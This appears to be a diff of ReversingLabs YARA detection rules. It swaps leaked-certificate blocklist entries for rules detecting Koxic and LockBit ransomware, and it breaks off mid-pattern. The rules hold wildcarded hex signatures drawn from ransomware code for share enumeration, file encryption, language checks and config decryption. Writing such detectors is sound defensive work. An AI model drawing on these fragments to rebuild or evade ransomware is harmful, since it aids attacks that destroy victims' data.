MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Koxic ransomware." author = "ReversingLabs" - id = "6cfb6ae0-8eba-503b-8bb7-ac72746d9aa2" - date = "2023-11-08" - modified = "2023-11-08" + id = "73c4afb0-cfa8-5bc5-bca3-49a7710f4ab9" + date = "2022-04-21" + modified = "2022-04-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L63-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e8f27c4a72f416a16acabb1de606fdde7dc694256809fdb952a25313dda0d34e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Koxic.yara#L1-L87" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "739faf047b95fd538422a42943fcaad6538549bf4cf33ed91385c61365af4f09" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Koxic" + tc_detection_factor = 5 importance = 25 + strings: + $enum_shares_p1 = { + 8B 45 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D + ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B + 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? C1 + E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B + } + $enum_shares_p2 = { + 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? + 0F B6 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 89 45 ?? EB ?? 8B 55 ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? + 0F 8C ?? ?? ?? ?? 8B 45 ?? 0F B7 8C 45 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 + ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? C6 45 ?? ?? EB ?? 8B 4D ?? 8D 94 4D ?? ?? + ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C9 8B 55 ?? 66 89 8C 55 ?? ?? FF + FF 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 + ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 EA ?? 89 + 55 ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B + 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 + ?? C1 E0 ?? 03 45 ?? B9 ?? ?? ?? ?? 6B D1 ?? 89 44 15 ?? B8 ?? ?? ?? ?? C1 E0 ?? 8B + 4D ?? 89 4C 05 ?? BA ?? ?? ?? ?? D1 E2 8B 45 ?? 89 44 15 ?? 8D 4D ?? 51 E8 ?? ?? ?? + ?? 83 C4 ?? E9 ?? ?? ?? ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? EB ?? 81 7D ?? ?? ?? ?? + ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 75 ?? B8 ?? ?? ?? ?? EB ?? 33 C0 + } + $find_files = { + 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 33 D2 8B 45 ?? 66 89 10 + 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 83 F8 ?? 75 ?? E9 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 44 02 ?? 3D ?? ?? ?? ?? + 72 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B + 48 ?? 81 79 ?? ?? ?? ?? ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 8B 95 ?? ?? ?? ?? 83 + E2 ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B 0D ?? ?? ?? ?? 51 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D + ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E2 ?? 8B 45 ?? 89 44 15 ?? 8D 4D + ?? 51 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 75 ?? 6A ?? A1 + } + $encrypt_files = { + 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? + E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 4D ?? 2B C8 8B + 45 ?? 1B C2 89 4D ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 50 + FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ?? + 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 FF + 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? + EB ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 + 45 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bit9, Inc" and pe.signatures[i].serial=="4f:2e:f2:9c:a5:f9:6e:57:77:b8:2c:62:f3:4f:d3:a6" and 1342051200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($enum_shares_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7Cc1Db2Ad0A290A4Bfe7A5F336D6800C : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Lockbit : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects LockBit ransomware." author = "ReversingLabs" - id = "89bc7c99-dea2-50ce-a0d2-4292c14d049e" - date = "2023-11-08" - modified = "2023-11-08" + id = "9a6405dc-da1f-5426-a424-a73bceb1928c" + date = "2022-03-31" + modified = "2022-03-31" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L81-L97" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c9f91edb525a02041bc20dff25ec58323f8fabd4d2a2eca63238ecb10ccef2a6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.LockBit.yara#L1-L282" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "030222bd659c7e0e03858fa062067b1483aca3b7973cce19a1e7cdbb48d4405c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "LockBit" + tc_detection_factor = 5 importance = 25 + strings: + $enum_resources_v1 = { + 55 8B EC 83 EC ?? 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? + ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 56 FF 75 ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 + C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 33 DB 39 5D ?? 76 ?? 8B F7 0F 1F 80 ?? ?? ?? ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8B CE E8 + ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 45 + ?? FF 70 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 8B 45 ?? FF 70 ?? 57 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B + 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? F0 FF 05 ?? ?? ?? ?? 8B 7D ?? 43 83 C6 ?? 3B 5D + ?? 72 ?? E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 5B 85 C0 + 75 ?? B8 ?? ?? ?? ?? 5F 8B E5 5D C3 33 C0 5F 8B E5 5D C3 + } + $find_files_v1_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B C1 C7 45 ?? ?? ?? ?? ?? 57 50 89 45 ?? 33 C9 8D + 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 4D ?? 50 FF 15 ?? ?? ?? ?? 83 + C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? + ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 33 C0 8B 35 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D + 45 ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D3 85 C0 + 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 + C0 0F 84 + } + $find_files_v1_2 = { + 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? E9 ?? ?? ?? ?? 33 C9 66 39 8D ?? ?? ?? ?? 74 ?? 8D 40 ?? 41 66 83 38 ?? 75 ?? + 83 F9 ?? 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 56 68 ?? ?? + ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? + 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 + } + $find_files_v1_3 = { + 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? + ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? + 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 + ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 C9 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? + ?? ?? 66 90 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 33 C0 C6 45 ?? ?? 66 89 45 ?? 8D + 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 + C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 + ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 + 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? + ?? ?? 8B 4D ?? 8D 95 ?? ?? ?? ?? 2B D1 0F B7 01 8D 49 ?? 66 89 44 11 ?? 66 85 C0 75 + ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ?? + 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 C7 ?? 0F 1F 40 ?? 66 8B 47 ?? 83 C7 ?? 66 + 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 A8 ?? 75 ?? + A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 + 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 5F + 5E 5B 8B E5 5D C3 + } + $encrypt_files_v1_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 53 56 57 8B F9 C7 45 ?? ?? ?? + ?? ?? 89 7D ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 + 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + } + $encrypt_files_v1_2 = { + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 33 DB 89 7D ?? 33 F6 0F 1F 00 8B 84 + B5 ?? ?? ?? ?? 85 C0 74 ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 B8 ?? ?? ?? ?? 0F 44 D8 46 + 81 FE ?? ?? ?? ?? 7C ?? 8B 7D ?? 33 C0 66 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 57 50 8D 85 ?? ?? ?? ?? 89 5D ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? + 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D3 83 F8 ?? 75 + ?? 8B CF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B + } + $encrypt_files_v1_3 = { + CF E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 FE ?? 7D ?? 46 EB ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 + FB ?? 75 ?? 8B 1D ?? ?? ?? ?? EB ?? FF 35 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B + E5 5D C3 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? FF 75 ?? FF 15 + ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 45 ?? 8B 75 ?? 89 43 ?? 8D 43 ?? 50 56 C7 + 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? + ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 4B ?? 8B 43 ?? 85 + C9 7F ?? 7C ?? 83 F8 ?? 72 ?? 83 E8 ?? C7 43 ?? ?? ?? ?? ?? 89 43 ?? 8B 43 ?? 83 D9 + ?? 89 43 ?? 8B 43 ?? 89 43 ?? 8D 83 ?? ?? ?? ?? 6A ?? 50 89 4B ?? C7 43 ?? ?? ?? ?? + ?? 89 73 ?? E8 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 6A ?? + 8D 73 ?? 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? + ?? ?? ?? 74 ?? 56 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 FF D6 83 C4 ?? FF 75 ?? FF 15 + ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 F0 FF 05 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? + B8 ?? ?? ?? ?? F0 0F C1 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7E ?? 8B 35 ?? ?? ?? ?? 6A + ?? FF D6 83 3D ?? ?? ?? ?? ?? 7D ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 + } + $check_blacklisted_languages_v2 = { + FF D0 0F B7 C0 B9 2C 08 ?? ?? 66 3B C1 0F 84 ?? ?? ?? ?? B9 2C 04 ?? ?? 66 3B C1 74 + ?? B9 2B 04 ?? ?? 66 3B C1 74 ?? B9 23 04 ?? ?? 66 3B C1 74 ?? B9 37 04 ?? ?? 66 3B + C1 74 ?? B9 3F 04 ?? ?? 66 3B C1 74 ?? B9 40 04 ?? ?? 66 3B C1 74 ?? B9 19 08 ?? ?? + 66 3B C1 74 ?? B9 19 04 ?? ?? 66 3B C1 74 ?? B9 28 04 ?? ?? 66 3B C1 74 ?? B9 42 04 + ?? ?? 66 3B C1 74 ?? B9 43 08 ?? ?? 66 3B C1 74 ?? B9 43 04 ?? ?? 66 3B C1 74 ?? B9 + 22 04 ?? ?? 66 3B C1 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 85 ?? ?? ?? ?? 64 + A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B C8 89 45 ?? 8B D0 89 4D ?? 0F B7 59 ?? 33 + FF 8B 71 ?? D1 EB C7 45 ?? ?? ?? ?? ?? 8D 04 5E 3B F0 0F 47 DF 85 DB 74 ?? 8A 0E 8D + 76 ?? 0F BE D1 80 E9 ?? 8B C2 83 C8 ?? 80 F9 ?? 0F 47 C2 47 33 45 ?? 69 C0 ?? ?? ?? + ?? 89 45 ?? 3B FB 75 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 01 8B + C8 89 4D ?? 3B C2 74 ?? 83 79 ?? ?? 75 ?? 33 DB 89 1D ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 43 ?? 8B 4C 18 ?? 8D 04 19 89 45 ?? + 3B C3 74 ?? 33 C9 89 4D ?? 39 48 ?? 74 ?? 8B 40 ?? 8B 55 ?? 03 C3 89 45 ?? 0F 1F 40 + ?? 8B 30 BF ?? ?? ?? ?? 8A 04 1E 03 F3 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA + 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF 69 F9 ?? ?? ?? ?? 84 C0 75 ?? 8B 4D ?? 8B 55 + ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 41 83 C0 ?? 89 4D ?? 89 45 ?? 3B 4A + ?? 75 ?? 33 C0 A3 ?? ?? ?? ?? 6A ?? FF D0 5F 5E 5B 8B E5 5D C3 + } + $create_net_host_trav_threads_v2 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 64 A1 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? + ?? ?? ?? E8 ?? ?? ?? ?? FF D0 85 C0 78 ?? A1 ?? ?? ?? ?? 8D 0C 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 35 + } + $fnv1a_hashing_v2 = { + 55 8B EC 83 EC ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 50 ?? A1 ?? ?? ?? ?? + 89 55 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 75 ?? 33 C0 A3 ?? ?? ?? ?? 8B E5 5D C3 8B 42 + ?? 8B 4C 10 ?? 8B 44 10 ?? 89 45 ?? 8D 04 11 89 45 ?? 3B C2 74 ?? 53 33 C9 56 57 89 + 4D ?? 39 48 ?? 74 ?? 8B 78 ?? 03 FA 8B 07 BE + } + $decrypt_configuration_v2_1 = { + 55 8B EC 51 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C9 83 EA ?? 75 ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? BA 25 1B 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? BA 78 0C 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + BA 39 28 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA F1 40 + 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA BF 11 00 00 B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 28 02 00 00 B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 3B 07 00 00 B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA A5 04 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? BA 0F 03 00 00 B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 C9 BE ?? ?? ?? ?? 85 FF 74 ?? 8B 15 ?? + ?? ?? ?? 0F 1F 44 00 ?? 80 3C 0A ?? 8D 46 ?? 0F 45 C6 41 8B F0 3B CF 72 ?? 8D 0C B5 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 1D ?? ?? ?? ?? 85 DB 74 ?? 33 FF 85 F6 74 ?? 90 + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 04 BB 47 3B FE 72 ?? 8B 0D ?? ?? + ?? ?? 33 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 0F 1F 80 ?? ?? ?? ?? 8B 14 B3 8A 08 8D 40 ?? + 88 0A 8D 52 ?? 84 C9 75 ?? 33 C9 E8 ?? ?? ?? ?? 46 85 C0 75 ?? C7 04 B3 ?? ?? ?? ?? + 5F 5E 5B 8B E5 5D C3 + } + $decrypt_configuration_v2_2 = { + 55 8B EC 51 53 56 57 8B F2 8B F9 6B CE ?? E8 ?? ?? ?? ?? 8B C8 33 C0 89 4D ?? 85 C9 + 0F 84 ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 72 ?? 0F 28 0D ?? ?? ?? ?? 8B CE 83 E1 ?? 66 + 0F 1F 84 00 ?? ?? ?? ?? 0F 10 04 07 66 0F EF C1 0F 11 04 07 0F 10 44 07 ?? 66 0F EF + C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF + C1 0F 11 44 07 ?? 83 C0 ?? 3B C1 72 ?? 8B 4D ?? 3B C6 73 ?? 80 34 38 5F 40 3B C6 72 + ?? 8B 5D ?? 8B D6 51 53 51 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 0B E8 ?? ?? + ?? ?? 8B F8 8B 45 ?? 89 38 8B 45 ?? 85 FF 74 ?? 8B 0B 